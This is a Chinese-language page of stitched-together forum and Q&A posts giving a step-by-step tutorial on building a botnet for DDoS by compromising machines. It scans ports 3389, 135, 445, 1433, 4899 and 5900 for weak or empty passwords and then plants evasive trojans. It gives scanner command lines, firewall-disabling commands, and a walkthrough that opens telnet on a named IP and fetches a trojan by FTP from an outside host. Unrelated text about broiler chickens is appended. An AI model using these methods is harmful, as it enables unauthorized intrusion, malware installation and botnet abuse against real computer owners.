ddos抓鸡教程_抓鸡ip端口扫描工具

外网可以扫描肉鸡吗?如果不行该怎么做

1：扫3389端口抓肉鸡

这个方法比较简单，适合新手朋友。

原理：

国内流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是默认开放3389服务的，我们就可以利用这一点来抓肉鸡。

方法：

扫描工具（如S等等）扫一段IP的3389端口，扫完后就直接用3389连接器连接开放3389的机器，也可以把结果保存为文本，用批量生成3389连接的工具生成链接，比较方便的，然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。

这种方法只能是XP系统，如果遇到2000或者2003系统就不要试了，除非有输入法漏洞，不过现在很少了，还有那么多的3389，干嘛在它上面浪费时间呢。汗- -！

这个方法缺点也是大大的，XP只支持单用户登入，，你再登入上去就会把他挤出去，而且不可以抓国外的肉鸡。

建议：中午或者半夜行动，因为有很多的人会开着机子下载，杀毒啊，去睡觉。我们就有可乘之机了。

扣扣： 493082006

2：扫135端口抓肉鸡

步骤：A:

a-先用扫描器扫一段IP的135端口

b-整理一下

c-NTSCAN过滤有弱口令的机器

d-最后用recton开telnet传马

B:

有一些自动抓鸡工具，功能类似，如Bluisland,Wmi,蜜蜂，知音等等，比较傻瓜化的。

这里简单说两点：Bluisland 木马改名为 boot.exe , IP保存为ip.txt,放在同一个目录下。

Wmi 需要修改，具体看操作。

问题：因为国内的一些网络运营商屏蔽了一部分的端口，你可能扫不到135，或者扫到的135没有检测到空口令？！怎么办？！

解决：1：你要开了这3个服务就可以开通

我的电脑--管理---服务

TCP/IP NetBIOS Helper

Remote Procedure Call (RPC) Locator

NT LM Security Support Provider

2：xp打线程补丁 一般线程为1000-3000之间就可以了 如果还扫不到就打4000

打好补丁之后重启。

3：抓鸡前关掉杀软和防火墙（包括系统自带的防火墙）

4：木马一定要免杀 扫的IP范围不要太大 XP系统扫的不是很快 有条件的见意装个2000或者2003系统，可以用syn方式扫

5：换个ip段扫。可以扫下本地的ip段。

6：终极解决方案，拿个服务器扫，这是最好的方法。

或者在鸽子或者别的肉鸡上扫，上传S扫描器

首先要关防火墙 CMD命令 net stop alg /y 或者net stop sharedaccess

S扫描器命令： s.exe syn《xp的机子为tcp》 开始IP，结束IP 端口 线程/save

s.exe syn 125.108.0.0 125.108.155.255 1433 700 /save

: 扫445端口抓肉鸡

扫135抓肉鸡差不多，先用扫描器扫一段IP的445端口，然后把结果整理，再用NTSCAN过滤有弱口令的机器，最后开共享传马，可以用啊D工具包。

屏蔽的话可以扫本地的445试下。

4：1433端口批量溢出抓肉鸡

原理：可以利用漏洞溢出实现全自动抓鸡，不过现在太多人搞，成功率不是很高。

工具：S.exe sqlhello.exe nc.exe 批处理文件

方法:先打开多个NC[非法字节],然后再打开扫描溢出的.bat,然后你就可以去睡觉去了。自动扫描，扫描完后 自动溢出，溢出后自动下马执行。

这就是批处理的威力，希望大家有时间多专研下，我在论坛发布的有详细的批处理教程文章。

另外有42 21等端口的溢出，原理都是类似的，大家自己尝试下吧。

5: 扫1433弱口令抓肉鸡

工具：端口扫描器 X-scan 和 SQL综合利用工具

原理：开1433端口的机器一般都装有SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。

方法：

先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，

接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了，扫描完成后会有个报告，列出了有弱口令的机器，

然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马。

另解：WINNTAutoAttack 原理一样。

6：扫4899空口令抓肉鸡

工具：扫描器 4899探测器 Radmin

原理： Radmin开放的端口默认为4899.

方法：先用端口扫描器扫一段IP的4899端口

用4899探测器导入开了4899端口的IP，过滤下

Radmin连接有空口令的机器，带开文件管理，上传运行你木马

7: 扫5900端口抓VNC肉鸡 工具：VNC扫描器 VNC连接器

原理：VNC开放5900端口

方法：先用VNC扫描器扫描一段IP的5900端口，

扫描格式为vscan.exe（扫描器文件名） -i 219.0.0.0-219.255.255.255（扫描IP段） -p 5900 -vnc -vv 建议扫国外的ip段，国外用这个的比较多，一般机子也不错的。

扫描完成后会在扫描器所在的同一文件夹生成一个文本文件，打开后有一列IP，IP后面的有一些单词比如patched,banned,vulnerable,只有为vulnerable才能连接。接着就用VNC连接器连接

135抓鸡教程

最近135抓鸡很火热啊，会抓而且能抓的人一天就可以抓数百只甚至千只，而不会也没条件抓的呢一只都抓不到，当然这其中是有很多原因的，想利用135抓鸡成功的话必须要掌握细节！总体来说，135抓鸡的流程就是：扫开放135端口的IP-----过滤这些IP中的空口令IP-----最后利用这些空口令IP进行传马，就这么简单，但是却很多人不成功，其实我相信大家都会的，只是由于某方面的限制而不能成功的，比如自己电脑的原因：1.XP打了线程补丁没？一般设置为3000以上；自己电脑的一些服务开放了没？比如扫135必须要开放的TCP/IP NetBIOS Helper Remote Procedure Call (RPC) Locator NT LM Security Support Provide 这几个服务；2.还有一个原因就是找找自己的电脑开放了共享没有？在DOS下输入net share看看自己电脑的共享情况，一般来说要开放ADMIN$...在这里呢，很多朋友说自己输入这个命令后却发现出现错误，没有共享的东西！这里我也遇到过，主要是由于自己的电脑做过某些优化而已！解决办法是打开电脑的SERVER服务，但是问题又来了，有些人会发现自己的电脑没有这个服务！怎么办？我告诉大家是网络邻居里的问题，解决办法如下：网上邻居----本地连接-----属性--看到安装的协议框里有没有“Microslft网络的文件和打印机共享”这个项目，如果没有就点下面的安装选项里进行安装，安装完了就会发现服务里多了SERVER一项了，呵呵，启动它就可以了！

-----------------------以上是电脑的要求

现在呢，大家按我的方法做好的电脑本身的要求外，又会发现，还是扫不了啊？原因我想大家都知道了，就是电信屏蔽了135端口，所以我们在本机扫135是扫不到的！很多人又问，我用代理可以吗？我的回答是：“最好别用，因为普通的SOCKET5代理扫出来很多都是假的，就像前段时间很多黑网出的一个用easy2game代理扫端口的教程，一扫就一大片，后面经过很多人的验证包括我也亲自验证了，发现扫出来的都是假的！！所以大家最好别去用！ 接下来呢，还有什么方法呢？找台可以扫135的服务器来扫对吧，我也用过，虽然还不错，但是对于大多数人来说不太适用，因为这样的肉鸡很难找！ 所以我还是推荐用VPN！ 然后又有很多问了，我用VPN扫可以扫出开放135的IP，但是过滤却一个也出不来？为什么呢？ 其实我原来也经常遇到过这样的情况，用VPN可以正常扫出135，但是用NTSCAN过滤空口令的时候最多出来几个子，我也一度曾想放弃VPN这个方法，但是后来的实验告诉我，VPN是有用的，而且绝对有用的！关键的问题是你连接这个VPN的速度！！加入你的电脑连接这个VPN的速度过慢，那是肯定扫不出来，因为这样的话，网络的迟缓非常严重，数据到不了自己电脑的！像很多人用的”Hotspot Shield Launch“这个软件，我在很多肉鸡上实验过，连接速度都是非常慢的！！扫不出什么肉鸡，而我每次只要使用连接速度快的VPN就能扫出很多的肉鸡，一般我所说的连接快的VPN呢，是指从开始连接到连接成功，时间应该不超过6秒钟~待会儿我会给大家提供一个香港的VPN的，呵呵！~

现在开始讲扫135的工具了，欲善其事，必先利其器！所以一个好用的工具也是非常重要的！接下来我就讲几个比较完善好用的工具，像蜜蜂2.0之类的垃圾软件我就不多说了!

加入不讲效率的话，一般人用的最多的组合是“S扫描器+NTSCAN+RECTON”，很简单，但是也很麻烦，只能单个单个的传马，速度很慢！ 这套工具我就不多说了，大家应该都会，主要就是说下，就是用NTSCAN过滤完了弱口令后，使用RECTON传马的时候也要在VPN连接的状态下，要不然不能成功连上肉鸡！

下一个工具呢，就说批量135脚本吧吧！ 其实关于脚本135应该有2套工具：一种是用NTSCAN扫玩了弱口令后，用批量溢出工具加上一个135批量溢出的批处理结合使用！-还有一种就是完全的批处理程序了，包括扫描135端口，过滤弱口令，传马，都在批处理里完成的，代表就是“自动抓鸡飘渺开源版”，只要输入IP就能全自动的抓鸡了，不过有个缺点，考虑弱口令的时候会有很多DOS窗口弹出来，速度呢，还算可以吧！！所以也建议大家使用！~

再下一个工具呢，当然就是WMI.EXE了，我本人现在也在使用这个工具，优点是：方便，速度快！缺点是：“要自己修改源程序代码，也就是那个3322的域名了，然后自己建了FTP就可以了 ，呵呵，挺方便的！

具体的工具就是这些了，这些工具的使用方法网上搜索下就可以了，很多额，也很简单的!

如果大家觉得好的话呢，就帮我踩下空间！还有大家有什么问题的话，可以留言，QQ112898881 我会尽快回答的！呵呵

参考资料：f

135抓鸡教程详细

超详细135端口抓鸡

用到的工具：

1：ssport端口扫描器

2：Recton--D贺免杀专用版

3：NTscan扫描器

4: 黑防版灰鸽子

5：UPX压缩和解压器(简单加下壳）

首先我们要用ssport扫开放 135端口的电脑，然后再用NTscan扫空口令的

这些我已经扫好了，相信大家都应该扫的来

我们就随便找个IP吧，就找 218.87.53.61

现在用

Recton--D来开它的telnet

有点卡，大家耐心等下吧，不晓得这个网吧网速怎么这么慢！

这个IP不行，我们换个，换成 218.87.51.251

正在连接 218.87.51.251 ......

连接成功！

正在检查Telnet服务状态 ......

Telnet服务已被禁止！

正在改变启动类型为 Manual（手动） ......

正在改变服务状态 ......

正在设置 NTLM=0 ......

正在设置 端口=23 ......

Telnet服务已经成功打开！端口:23 .]

呵呵，已经成功打开了23端口，现在我们来配置下我们的鸽子

由于这个网吧的路由我还没拿到，所以鸽子上线我用映射9999端口的

这个教程我已经做过了，如果不懂的可以去找，

恩，打开远程映射端口成功，可以上线，现在我们来配置下我们的鸽子

给我们的鸽子随便加下壳，运气好可以免杀

比较好的免杀我现在就不做了，没时间，呵呵，具体我以后会在教程里发布的

已经加壳了，现在我们把鸽子丢到我们的空间上去，已经上去了

现在就该到肉鸡上去下鸽子了

用户名是：administrator

密码为 空

有点卡，呵呵

好，进去了，刚刚有人中了我的网马，呵呵]

现在我们来下我们的鸽子

用到的命令是 ftp

o

to 219.147.204.240

用户名

密码

然后进去后，get 你的马，我的就是 get 2.exe

具体看我操作

输入密码的时候，是看不到你输入的，呵呵

好了下载好了 ，看到 马了没

现在我们来运行它，如果不行的话，那可能就要关掉对方的防火墙

命令是 net stop sharedaccess

好了，木马已经运行了

我们去看下它有没有上线

好，已经上线了，IP地址主要是因为我是映射鸽子上线的，所以IP不显示

公网IP，我们来扑捉下屏幕

晕，不晓得为什么 扑捉不到屏幕，呵呵，反正已经上线了，任务完成

怎么抓“鸡”？

最好用要工具，比如竹子做的那种竹筐，生手的话还是要用工具，一罩就罩住了，然后再用手抓，最好带橡胶手套，不然鸡有股臊味。

如果是街上的鸡，那准备好钱就可以抓了。

如果是网络上的鸡，劝你还是别抓了，警察叔叔很多的。

你上baidu上看多点教程。在baidu上打抓鸡教程就有一大把。要不你去华夏那里看那里有很多教程的配置灰鸽子。抓鸡。都有。05112.com这个也不错，是国内最大的黑客网。

黑客知道肉鸡ip后如何入侵肉鸡的

最简单的方法就是使用软件入侵：首先，获得对方的IP，使用【流光IP扫描器】扫描对方电脑的端口漏洞。如果端口有漏洞的话，可以直接进行攻击控制电脑。如果电脑没有端口漏洞、接着我们就需要使用【啊D注入工具】，对对方电脑进行弱口令注入。再攻击。如果是为了纯粹抓鸡，不限制IP的话，可以使用3389端口扫描器或者灰鸽子。这种方法是傻瓜式的，有利有弊，虽然操作简单容易上手，但是会留下入侵痕迹。高手可以找到的。请慎用。

什么是肉鸡,如何抓肉鸡

所谓肉鸡就是指专门用于生产鸡肉的仔鸡，它是食用肉仔鸡的总称。现代肉鸡的概念与传统肉鸡截然不同。50年代以前，传统肉鸡主要来源于淘汰的小公鸡和产蛋鸡，而现代肉鸡则是指通过专门化品系配套杂交生产的专门用于食肉的鸡。根据屠宰期和体重大小的不同，一般分为肉用仔鸡、炸用仔鸡和烤用仔鸡。肉用仔鸡一般2千克左右屠宰，炸用仔鸡较大一些，烤用仔鸡则更大。现在各国生产的肉鸡都以肉仔鸡为主。东、西方各国由于消费习惯和烹调方式的不同，肉仔鸡出售的体重和日龄也有所不同。美国所说的肉用仔鸡，大部分为6～7周龄，体重在1.90～2.25千克出售的肉鸡。在加工鸡肉产品中，作1/2或1/4分割的约占50%，加工成净肉的约有30%，加工白条、净膛和胴体的肉鸡约占20%，这些加工鸡肉产品中约有30%用作快餐。而北欧、东欧各国及荷兰生产的肉用仔鸡，大部分4～5周龄、体重在1.3～1.5千克出售，且多以整鸡或1/2或1/4分割后作烤鸡用。西班牙、意大利、法国等南欧各国生产的肉用仔鸡，一般在6～7周龄、体重1.8～2.2千克出售，多用于带骨烤或煮菜用。日本则很特殊，大部分肉鸡加工成净肉用，约占80%，带骨用的只占20%左右。在世界上肉鸡出售体重最大的，一般在1.9～2.7千克。这是因为鸡大，出肉率高，净肉成本低，且零售店欢迎腿肉和胸肉。日本生产的体重在1.1～1.5千克的小型肉用仔鸡，主要是供旅馆、饭店、菜馆等业务用，这种小型鸡一般养4～5周龄出售，数量约占总产量的20%左右。